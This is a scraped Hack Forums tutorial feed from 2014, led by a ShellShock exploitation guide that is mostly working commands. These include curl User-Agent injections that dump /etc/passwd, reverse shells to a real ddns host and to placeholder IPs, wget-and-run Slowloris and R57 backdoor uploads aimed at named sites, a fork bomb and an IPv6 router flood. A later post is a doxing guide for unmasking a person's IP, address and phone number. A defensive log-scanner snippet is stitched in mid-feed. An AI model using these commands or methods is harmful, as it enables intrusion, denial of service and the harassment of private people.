Hack Forums - Hacking Tutorials
- Complete ShellShock TuT
- cannot find win32...
- How to Dox (No IT Skills Needed)
- Lol OCE sentry config help!
- Help With This?
Posted: 28 Oct 2014 08:04 AM PDT

I recently met a very cool Japanese hacker online who helped me completely understand the vulnerability ShellShock and all the different ways to exploit it... so I'm here to pass on his knowledge! If you find this informative or helpful please give positive reputation.

This year probably the biggest vulnerability ever was disclosed; it was dubbed 'ShellShock'. It was a vulnerability in all systems implementing Bash, which is the majority of Linux and Mac operating systems. Just the simple string () { :;}; when injected into a bash environment variable or a process that uses bash like Headers, User-Agent, Referer, Curl and Wget will allow remote code execution... this 0-day is 100x worse than HeartBleed!! Especially since there are 5 versions of the exploit...

--------------------------- How to "Patch" lol -------------------------

sudo apt-get update && sudo apt-get install --only-upgrade bash

or

yum -y update bash; apt-get -y update bash; reboot

--Exploit 1 (CVE-2014-6271)--

There are a few different ways to test if your system is vulnerable to shellshock. Try running the following command in a shell.

env x='() { :;}; echo vulnerable' bash -c "echo this is a test"
env x='() { :;}; echo RMS' bash -c "echo PWNed you"
'() { :; }; bash -i >& /dev/tcp/0xsynack.ddns.net/31337 0>&1'

If you see "vulnerable" you need to update bash. Otherwise, you should be good to go.

--Exploit 2 (CVE-2014-7169)--

Even after upgrading bash you may still be vulnerable to this exploit. Try running the following code.

env X='() { (a)=>\' bash -c "echo date"; cat echo ; rm -f echo

If the above command outputs the current date (it may also show errors), you are still vulnerable.

---Exploit 3 (???)---

Here is another variation of the exploit. Please leave a comment below if you know the CVE of this exploit.

env -i X=' () { }; echo hello' bash -c 'date'

If the above command outputs "hello", you are vulnerable.

------Exploit 4 (CVE-2014-7186)-------

bash -c 'true <<EOF <<EOF <<EOF <<EOF <<EOF <<EOF <<EOF <<EOF <<EOF <<EOF <<EOF <<EOF <<EOF <<EOF' || echo "CVE-2014-7186 vulnerable, redir_stack"

---------------Exploit 5 (CVE-2014-7187)-----------------

(for x in {1..200} ; do echo "for x$x in ; do :"; done; for x in {1..200} ; do echo done ; done) | bash || echo "CVE-2014-7187 vulnerable, word_lineno"

---Different Environment Variable Injections:---

() { :; }; :(){ :|: & };: () { (a)=>\ () { :; };

The types of exploits with ShellShock are literally endless, especially if you get a reverse tcp shell or a PHP backdoor shell! Just gonna show a few examples here like...

- Dorking
- Data download/upload
- DDoS
- Netcat Reverse Tcp Shell
- AG or R57 shell upload (a simple backdoor in case they patch bash)

Using the different utils like Curl, Wget or a User Agent Switcher. Servers with a /cgi-bin/ folder and .sh or .cgi extensions are vulnerable unless updated \!/

+ ShellShock Dorks +

filetype:cgi inurl:cgi-bin filetype:cgi inurl:cgi-bin filetype:sh inurl:"server-status" intitle:apache "cgi-bin" sitemap.xml filetype:xml intext:"cgi-bin" filetype:sh inurl:cgi-bin site:[your domain] inurl:cgi-bin "GATEWAY_INTERFACE = CGI" inurl:/cgi-sys/entropysearch.cgi inurl:/cgi-sys/FormMail-clone.cgi

------------- Breakdown -----------------

curl -A '() { :;}; ping -l 100000 -n 1000 x.x.x.x' website.com/cgi-bin/example.sh

util: curl | exploit: () { :;}; | the payload: ping -l 100000 -n 1000 x.x.x.x | vulnerable slave: website.com/cgi-bin/example.sh

Easiest and quickest way to find out 100% if a site is vuln to shellshock is to try and echo the content of a folder during a curl download. If there is extra output at the top of the saved file then they are vulnerable; if the downloaded file looks normal then it's not. Most people just use 3rd party sites to check if vulnerable but they can give false positives a lot...

-------------Curl Data Manipulation----------------------------------------------------

Easiest and quickest way

curl -A "() { :; }; echo; /bin/ls lah" website.com/cgi-bin/ex.sh > data.html
curl -A "() { :; }; echo; /bin/ls -l /bin" website.com/cgi-bin/ex.sh > data.html
curl -A "() { :; }; echo; /bin/cat /etc/passwd" website.com/cgi-bin/ex.sh > data.html

--------- + User Agent Switcher +-----------------

Probably the easiest to do for the lazies lol. All you have to do is download the correct addon for your browser, fill in different user agent shellshock exploits then just browse to the vulnerable site to exploit!

Chrome: https://chrome.google.com/webstore/detai...g?hl=en-US
Firefox: https://addons.mozilla.org/en-US/firefox...-switcher/

Fork Bomb DoS: () { :; }; :(){ :|: & };:
Ping of Death: () { :;}; ping -l 100000 -n 1000 dwsd.org -S google.com
Slowloris: () { :;}; wget http://pastebin.com/raw.php?i=FzrZ2hdr -O /tmp/slowloris.pl;chmod 777 /tmp/slowloris.pl;./tmp/slowloris.pl -dns http://www.dwsd.org -port 80 -timeout 2000 -num 500 -tcpto 5 -shost google.com
Reverse TCP Shell: () { :; }; bash -i >& /dev/tcp/IPADDRESS/31337 0>&1
Backdoor R57 Shell: () { :; }; wget http://pastebin.com/raw.php?i=S9tzBgg3 -O license.php; chmod 777 license.php

-------------------------------------- Reverse Tcp Shell -----------------------------------

nc -l 31337
bash -i >& /dev/tcp/No-IP Address/31337 0>&1
curl -A '() { :; }; /bin/bash -i >& /dev/tcp/No-IP address/31337 0>&1' crossovers.net/cgi-bin/fortune.sh

------------------------------- PHP Backdoor Shells -----------------------------------

---- R57 Shell ----

curl -A "() { :; }; wget http://pastebin.com/raw.php?i=S9tzBgg3 -O license.php; chmod 777 license.php" http://www.ocnus.com/cgi-bin/stereogram.sh

---- AG Shell ----

curl -A "() { :; }; wget https://ghostbin.com/paste/233za/raw -O license.php; chmod 777 license.php"

-------------- DoS any Windows Machine on Network ;) -------------------

Once you have a reverse tcp shell or PHP shell you can do fun things like DoS all Windows machines on their network.

echo 'Passw0rd' | sudo -S cat /etc/shadow
sudo su
apt-get install thc-ipv6
yum install thc-ipv6
apt-rpm install thc-ipv6
atk6-flood_router26 eth0
atk6-flood_router26 wlan0
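The post says the injected string rides in on headers such as User-Agent and Referer and that bash only bites when a value begins with the `() {` marker. As an added example that is not part of the original post, here is a small defender-side scanner that walks Apache combined-format access log lines (constructed samples, not real traffic), flags header values that start with that marker, and pulls out the command bash would have run, which is what an incident responder needs from the log. The log format, field names and the CVE-style labels are my own assumptions.

```python
import re

# Bash's env-function import only fires when a value STARTS with the
# function-definition marker "() {", so the regex is anchored at the start
# (leading whitespace allowed, matching the ' () { }' form in the post).
SHELLSHOCK_RE = re.compile(r"^\s*\(\)\s*\{")
# Shape of the incomplete-fix variant (CVE-2014-7169) shown in the post: "() { (a)=>\"
VARIANT_7169_RE = re.compile(r"^\s*\(\)\s*\{\s*\(a\)=>\\")

# Apache "combined" log format (assumed); the last two quoted fields are the
# Referer and User-Agent headers that a CGI handler exports into bash's env.
COMBINED_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<req>[^"]*)" (?P<status>\d{3}) '
    r'(?P<bytes>\S+) "(?P<referer>[^"]*)" "(?P<ua>[^"]*)"'
)

# Constructed sample log lines (RFC 5737 documentation addresses, not real traffic).
SAMPLE_LOG = [
    '203.0.113.7 - - [28/Oct/2014:08:04:00 -0700] "GET /cgi-bin/example.sh HTTP/1.1" '
    '200 512 "-" "() { :;}; echo vulnerable"',
    '198.51.100.9 - - [28/Oct/2014:08:05:10 -0700] "GET /cgi-bin/example.sh HTTP/1.1" '
    '200 512 "() { :; }; bash -i >& /dev/tcp/IPADDRESS/31337 0>&1" "curl/7.38.0"',
    '192.0.2.55 - - [28/Oct/2014:08:06:00 -0700] "GET /index.html HTTP/1.1" '
    '200 2048 "-" "Mozilla/5.0 (X11; Linux x86_64)"',
]

def classify(value):
    """None for a benign header value; otherwise (variant, payload), where
    payload is the text bash would run (the part after the first "};")."""
    if not SHELLSHOCK_RE.match(value):
        return None
    if VARIANT_7169_RE.match(value):
        return ("CVE-2014-7169-style", value)
    parts = value.split("};", 1)
    return ("CVE-2014-6271-style", parts[1].strip() if len(parts) == 2 else "")

def scan_log(lines):
    """Return (client ip, request, header name, payload) for every hit."""
    hits = []
    for line in lines:
        m = COMBINED_RE.match(line)
        if not m:
            continue  # not in combined format; skip rather than guess
        for header in ("referer", "ua"):
            found = classify(m.group(header))
            if found is not None:
                hits.append((m.group("ip"), m.group("req"), header, found[1]))
    return hits
```

Apache writes a backslash inside a logged header as `\\`, so unescape the field before calling classify on a real log if the 7169 shape matters to you. Calling scan_log(SAMPLE_LOG) reports the first two sample lines and ignores the ordinary browser request.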
Posted: 28 Oct 2014 03:23 AM PDT

Hello all :) How are you? I hope you are good and fine :) It's me, Mr.Altenen. I have a problem with setting up Kali on my Windows. When I click the setup it gives this error: cannot find win32.loader.ini. What is the problem? I use Win 7 and I want to use Kali too on my computer, alongside Windows 7 and Ubuntu.
How to Dox (No IT Skills Needed)

Posted: 28 Oct 2014 03:18 AM PDT

Before we start, I suggest using this for doxing. This will help keep things organized.

Username/s/:
E-mail:
City:
Zip/Postal:
State/Province:
Country:
IP address:
ISP:
Operating System:
Home Address:
Phone number:
Cell Phone number:
Website:
Photos:

You can add more to this list if needed.

How to get IP address?

I suggest using http://whatstheirip.com. On this website, you enter your e-mail, and you get a set of links. Pick any link, copy and paste, and give the link to your slave saying something similar to "LOL THIS IS HILARIOUS". Once clicked, the IP will be sent to your e-mail.

If your slave has e-mailed you, you can get the IP by looking at the e-mail source. To look at the e-mail source for Windows Live users, right click on the message, and click 'View Message Source'. When you're looking at the source, look for this: 'Received: by'. It will show you an IP address. This is the IP address of your slave.

If your slave has commented on your blog (wordpress or blogspot) you can view the IP address by looking in your comments.

Once you have the IP address of your slave, go to http://ipaddress.com and enter the IP of your slave. You now have the location, zip code, state, country, ISP, and operating system. Fill all this in your notepad and keep going.

How to get e-mail?

If you do not have the trust of your slave, Google the user and put @ at the end. Example: 'username' @. If the user has posted their e-mail on any website, it should come up and you can find their e-mail. If you do have the trust of your slave, make a new msn account (if you don't want them having your main msn), and have him/her add you on msn. You now have the e-mail of your slave.

Facebook: Put the e-mail of your slave into Facebook search. If your slave uses Facebook, you can find out (at the minimum) their name. If your slave uses Facebook but does not protect their information, you can find out loads of information.

The PayPal Method: When you have the e-mail of your slave, log in to PayPal. Transfer .01 USD to the e-mail of your slave. When sent, you will have all of the information on the PayPal account. (Name, address, phone, etc.)

Tracing Photos: If your slave has photos online, save the photo and go to a website named http://tineye.com. On this website, upload the picture of your slave. When it is finished, you can find out if this photo is uploaded on any other websites. You can also find out if the photo is fake.

Address: If you have the name of your slave, it is possible you can find the address of your slave. I suggest using the following websites: http://411.com and http://whitepages.com. Using these websites you can also find out their phone number.

Note: My source is http://www.egyhacks.net/2012/04/how-to-dox.html
Posted: 28 Oct 2014 03:03 AM PDT

Can anyone give me the OCE config file, or does anyone know how to edit an NA file to change it to OCE? Please help!
Posted: 27 Oct 2014 08:37 PM PDT

Alrighty! I am not sure if you are familiar with Steam and CS:GO skins, so here is a brief description. You can buy and play games on Steam with other people, and there are various items that you can trade that have value (only in Steam) such as CS:GO skins. CS:GO is a Counter Strike game on Steam that people play for competition. Skins have pretty much no use other than to show off and see who has the most expensive one. Now, my friend has a program that allows him to send it to other people, and when they open it, it will automatically send him a trade notification with all of the skins in the other person's inventory for you to steal. I thought maybe he was just ratting someone and sending the trade offer from there, but he says that it is automatic. If you have any idea what this is, or could maybe explain this to me, I would EXTREMELY appreciate it. Thanks in advance!